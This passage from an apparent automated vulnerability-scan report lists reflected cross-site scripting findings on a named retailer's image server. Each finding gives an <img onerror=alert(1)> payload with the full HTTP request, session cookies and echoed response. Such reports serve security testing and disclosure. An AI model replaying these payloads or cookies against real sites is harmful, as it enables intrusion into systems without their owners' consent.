User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:41 GMT
Connection: close

Unable to find /pacsunproducts/8160301_01f58d7<img src=a onerror=alert(1)>7d70f72ae03

3.132. http://images3.pacsun.com/is/image/pacsunproducts/8170284_01_001 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8170284_01_001

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f4718<img%20src%3da%20onerror%3dalert(1)>bea69b6fa7f was submitted in the REST URL parameter 4. This input was echoed as f4718<img src=a onerror=alert(1)>bea69b6fa7f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8170284_01_001f4718<img%20src%3da%20onerror%3dalert(1)>bea69b6fa7f?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:43 GMT
Connection: close

Unable to find /pacsunproducts/8170284_01_001f4718<img src=a onerror=alert(1)>bea69b6fa7f

3.133. http://images3.pacsun.com/is/image/pacsunproducts/8170284_sw_001 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8170284_sw_001

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload bd500<img%20src%3da%20onerror%3dalert(1)>63f1c2b1e91 was submitted in the REST URL parameter 4. This input was echoed as bd500<img src=a onerror=alert(1)>63f1c2b1e91 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8170284_sw_001bd500<img%20src%3da%20onerror%3dalert(1)>63f1c2b1e91?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:41 GMT
Connection: close

Unable to find /pacsunproducts/8170284_sw_001bd500<img src=a onerror=alert(1)>63f1c2b1e91

3.134. http://images3.pacsun.com/is/image/pacsunproducts/8170284_sw_014 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8170284_sw_014

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c2c8e<img%20src%3da%20onerror%3dalert(1)>48fe2b1cfa8 was submitted in the REST URL parameter 4. This input was echoed as c2c8e<img src=a onerror=alert(1)>48fe2b1cfa8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8170284_sw_014c2c8e<img%20src%3da%20onerror%3dalert(1)>48fe2b1cfa8?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:41 GMT
Connection: close

Unable to find /pacsunproducts/8170284_sw_014c2c8e<img src=a onerror=alert(1)>48fe2b1cfa8

3.135. http://images3.pacsun.com/is/image/pacsunproducts/8173775_01_080 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8173775_01_080

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a8212<img%20src%3da%20onerror%3dalert(1)>0c3e014616a was submitted in the REST URL parameter 4. This input was echoed as a8212<img src=a onerror=alert(1)>0c3e014616a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8173775_01_080a8212<img%20src%3da%20onerror%3dalert(1)>0c3e014616a?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:08 GMT
Connection: close

Unable to find /pacsunproducts/8173775_01_080a8212<img src=a onerror=alert(1)>0c3e014616a

3.136. http://images3.pacsun.com/is/image/pacsunproducts/8173775_sw_041 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8173775_sw_041

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 29dbe<img%20src%3da%20onerror%3dalert(1)>537d4a97d74 was submitted in the REST URL parameter 4. This input was echoed as 29dbe<img src=a onerror=alert(1)>537d4a97d74 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8173775_sw_04129dbe<img%20src%3da%20onerror%3dalert(1)>537d4a97d74?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:09 GMT
Connection: close

Unable to find /pacsunproducts/8173775_sw_04129dbe<img src=a onerror=alert(1)>537d4a97d74

3.137. http://images3.pacsun.com/is/image/pacsunproducts/8173775_sw_080 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8173775_sw_080

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9b4ba<img%20src%3da%20onerror%3dalert(1)>151550698b2 was submitted in the REST URL parameter 4. This input was echoed as 9b4ba<img src=a onerror=alert(1)>151550698b2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8173775_sw_0809b4ba<img%20src%3da%20onerror%3dalert(1)>151550698b2?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:07 GMT
Connection: close

Unable to find /pacsunproducts/8173775_sw_0809b4ba<img src=a onerror=alert(1)>151550698b2

3.138. http://images3.pacsun.com/is/image/pacsunproducts/8177750_01 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8177750_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3b1e3<img%20src%3da%20onerror%3dalert(1)>4fa5924f20c was submitted in the REST URL parameter 4. This input was echoed as 3b1e3<img src=a onerror=alert(1)>4fa5924f20c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8177750_013b1e3<img%20src%3da%20onerror%3dalert(1)>4fa5924f20c?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:05 GMT
Connection: close

Unable to find /pacsunproducts/8177750_013b1e3<img src=a onerror=alert(1)>4fa5924f20c

3.139. http://images3.pacsun.com/is/image/pacsunproducts/8184954_01 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8184954_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c989f<img%20src%3da%20onerror%3dalert(1)>b103b4531c7 was submitted in the REST URL parameter 4. This input was echoed as c989f<img src=a onerror=alert(1)>b103b4531c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8184954_01c989f<img%20src%3da%20onerror%3dalert(1)>b103b4531c7?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:52 GMT
Connection: close

Unable to find /pacsunproducts/8184954_01c989f<img src=a onerror=alert(1)>b103b4531c7

3.140. http://images3.pacsun.com/is/image/pacsunproducts/8198103_01 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8198103_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 33297<img%20src%3da%20onerror%3dalert(1)>decb9bf7941 was submitted in the REST URL parameter 4. This input was echoed as 33297<img src=a onerror=alert(1)>decb9bf7941 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8198103_0133297<img%20src%3da%20onerror%3dalert(1)>decb9bf7941?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:07 GMT
Connection: close

Unable to find /pacsunproducts/8198103_0133297<img src=a onerror=alert(1)>decb9bf7941

3.141. http://images3.pacsun.com/is/image/pacsunproducts/8202103_01 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8202103_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5bcee<img%20src%3da%20onerror%3dalert(1)>c14eea029ba was submitted in the REST URL parameter 4. This input was echoed as 5bcee<img src=a onerror=alert(1)>c14eea029ba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8202103_015bcee<img%20src%3da%20onerror%3dalert(1)>c14eea029ba?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:15 GMT
Connection: close

Unable to find /pacsunproducts/8202103_015bcee<img src=a onerror=alert(1)>c14eea029ba

3.142. http://images3.pacsun.com/is/image/pacsunproducts/8203333_01_001 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8203333_01_001

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 90828<img%20src%3da%20onerror%3dalert(1)>fe6a2201130 was submitted in the REST URL parameter 4. This input was echoed as 90828<img src=a onerror=alert(1)>fe6a2201130 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8203333_01_00190828<img%20src%3da%20onerror%3dalert(1)>fe6a2201130?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:53 GMT
Connection: close

Unable to find /pacsunproducts/8203333_01_00190828<img src=a onerror=alert(1)>fe6a2201130

3.143. http://images3.pacsun.com/is/image/pacsunproducts/8203333_sw_001 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8203333_sw_001

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e3b3c<img%20src%3da%20onerror%3dalert(1)>13da9e9c6eb was submitted in the REST URL parameter 4. This input was echoed as e3b3c<img src=a onerror=alert(1)>13da9e9c6eb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8203333_sw_001e3b3c<img%20src%3da%20onerror%3dalert(1)>13da9e9c6eb?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
